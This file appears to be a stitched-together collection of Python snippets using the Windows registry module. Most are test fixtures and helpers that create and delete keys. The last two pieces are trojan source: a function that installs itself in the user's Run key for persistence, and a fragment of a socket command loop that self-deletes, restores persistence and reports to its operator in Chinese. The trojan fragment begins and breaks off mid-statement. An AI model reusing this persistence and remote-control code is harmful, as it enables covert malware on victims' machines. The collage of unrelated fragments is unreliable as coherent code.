def setup_module(machinery, name, path=None): if machinery.WindowsRegistryFinder.DEBUG_BUILD: root = machinery.WindowsRegistryFinder.REGISTRY_KEY_DEBUG else: root = machinery.WindowsRegistryFinder.REGISTRY_KEY key = root.format(fullname=name, sys_version='%d.%d' % sys.version_info[:2]) base_key = "Software\\Python\\PythonCore\\{}.{}".format( sys.version_info.major, sys.version_info.minor) assert key.casefold().startswith(base_key.casefold()), ( "expected key '{}' to start with '{}'".format(key, base_key)) try: with temp_module(name, "a = 1") as location: try: OpenKey(HKEY_CURRENT_USER, base_key) if machinery.WindowsRegistryFinder.DEBUG_BUILD: delete_key = os.path.dirname(key) else: delete_key = key except OSError: delete_key = base_key subkey = CreateKey(HKEY_CURRENT_USER, key) if path is None: path = location + ".py" SetValue(subkey, "", REG_SZ, path) yield finally: if delete_key: delete_registry_tree(HKEY_CURRENT_USER, delete_key)
def maybe_set_key(key_path: str, expected: str, dry_run: bool = False, var_name: str = None): from winreg import HKEY_CLASSES_ROOT, OpenKey, QueryValue, CreateKeyEx, SetValue, REG_SZ, KEY_WRITE, KEY_READ from winreg import QueryValueEx, SetValueEx try: with OpenKey(HKEY_CLASSES_ROOT, key_path, 0, KEY_READ) as entry_key: if var_name: value = QueryValueEx(entry_key, var_name)[0] else: value = QueryValue(entry_key, None) except FileNotFoundError: value = None if value != expected: prefix = '[DRY RUN] Would set' if dry_run else 'Setting' if var_name: log.info(f'{prefix} HKEY_CLASSES_ROOT\\{key_path}[{var_name!r}] = {expected!r}') else: log.info(f'{prefix} HKEY_CLASSES_ROOT\\{key_path} = {expected!r}') if not dry_run: with CreateKeyEx(HKEY_CLASSES_ROOT, key_path, 0, KEY_WRITE) as entry_key: if var_name: SetValueEx(entry_key, var_name, 0, REG_SZ, expected) else: SetValue(entry_key, None, REG_SZ, expected) # noqa else: log.info(f'Already contains expected value: HKEY_CLASSES_ROOT\\{key_path}')
def test_long_key(self): from winreg import (HKEY_CURRENT_USER, KEY_ALL_ACCESS, CreateKey, SetValue, EnumKey, REG_SZ, QueryInfoKey, OpenKey, DeleteKey) name = 'x' * 256 try: with CreateKey(HKEY_CURRENT_USER, self.test_key_name) as key: SetValue(key, name, REG_SZ, 'x') num_subkeys, num_values, t = QueryInfoKey(key) EnumKey(key, 0) finally: with OpenKey(HKEY_CURRENT_USER, self.test_key_name, 0, KEY_ALL_ACCESS) as key: DeleteKey(key, name) DeleteKey(HKEY_CURRENT_USER, self.test_key_name)
def setup_module(machinery, name, path=None): if machinery.WindowsRegistryFinder.DEBUG_BUILD: root = machinery.WindowsRegistryFinder.REGISTRY_KEY_DEBUG else: root = machinery.WindowsRegistryFinder.REGISTRY_KEY key = root.format(fullname=name, sys_version=sys.version[:3]) try: with temp_module(name, "a = 1") as location: subkey = CreateKey(HKEY_CURRENT_USER, key) if path is None: path = location + ".py" SetValue(subkey, "", REG_SZ, path) yield finally: if machinery.WindowsRegistryFinder.DEBUG_BUILD: key = os.path.dirname(key) delete_registry_tree(HKEY_CURRENT_USER, key)
def test_simple_write(self): from winreg import SetValue, QueryValue, REG_SZ value = "Some Default value" SetValue(self.root_key, self.test_key_name, REG_SZ, value) assert QueryValue(self.root_key, self.test_key_name) == value
def windows_registry_set_key(key_path, value): from winreg import CreateKey, SetValue, HKEY_CURRENT_USER, REG_SZ with CreateKey(HKEY_CURRENT_USER, key_path) as sub_key: SetValue(sub_key, None, REG_SZ, value)
def ziqidong(): caller_file = argv[0] caller_file = caller_file.replace('/', '\\') #caller_file = caller_file.replace('py', 'exe') key = OpenKey(HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion") SetValue(key, "Run", REG_SZ, caller_file)
t = 1 break elif lei == '4': c = s.recv(100).decode('utf-8') if c == '0': caller_filez = argv[0] caller_filez = caller_filez.replace('/', '\\') caller_file = caller_filez.replace('win_64.exe', 'win_64_1.txt') minglin = r'del /a/f/q {}'.format(caller_file) system(minglin) caller_file = caller_filez.replace('win_64.exe', 'win_64_2.txt') minglin = r'del /a/f/q {}'.format(caller_file) system(minglin) kong = '' key = OpenKey(HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion") SetValue(key, "Run", REG_SZ, kong) cc = '它自毁了,请节哀,并准备下一个目标吧|斜眼笑|' s.send(cc.encode('utf-8')) continue ziqidong() caller_file = argv[0] caller_file = caller_file.replace('/', '\\') caller_file = caller_file.replace('py', 'exe') c = '木马:已再次写入注册表'+'\n具体目录为:'+caller_file s.send(c.encode('utf-8')) else: print('收到垃圾信息') sleep(30) break if t == 1: s.send('木马已被kill,他(她)暂时安全了'.encode('utf-8'))